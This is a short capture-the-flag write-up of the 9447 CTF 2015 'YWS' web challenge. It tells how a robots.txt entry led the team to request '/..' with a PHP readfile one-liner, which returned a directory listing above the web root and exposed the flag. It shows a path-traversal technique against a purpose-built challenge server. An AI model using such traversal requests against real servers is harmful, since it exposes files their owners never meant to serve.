[9447 CTF 2015] [Web 130 – YWS] Write Up

Description

My friend wrote a cool web server. I’m sure he’s stored some great doxxxs on the website. Can you take a look and report back any interesting things you find?

The web page is at http://yws-fsiqc922.9447.plumbing

Resolution

First we noticed the high quality theme with beautiful blinking images, but the best was this very nice song:

Most of us tried to navigate through the images directories:
http://yws-fsiqc922.9447.plumbing/images/
http://yws-fsiqc922.9447.plumbing/images/secret_images

There was a picture here, but it’s a WEB challenge, not a STEG one!
We decided to drop it, what a troll 🙁

Later we found a robots.txt file:

User-agnet: *
Disallow: /
Disallow: /..
Disallow: .
Disallow: ..
Disallow: /work
Disallow: /imegas/
Allow: /sounds/pljesus.wav

Disallow “/..” ? WTF!
Using PHP, we browsed the directory:

php -r "readfile('http://yws-fsiqc922.9447.plumbing/..');"
<html>
<head>
<title>Directory listing for /..</title>
</head>
<body>
<h2>Directory listing for /..</h2>
<hr>
<ul>
<li><a href="/../9447{D1rect0ries_ARe_h4rd}">9447{D1rect0ries_ARe_h4rd}</a>
<li><a href="/../.">.</a>
<li><a href="/../..">..</a>
<li><a href="/../gws">gws</a>
<li><a href="/../files">files</a>
</ul>
<hr>
</body>
</html>

Flag was : 9447{D1rect0ries_ARe_h4rd}.

Leave a Reply

Your email address will not be published. Required fields are marked *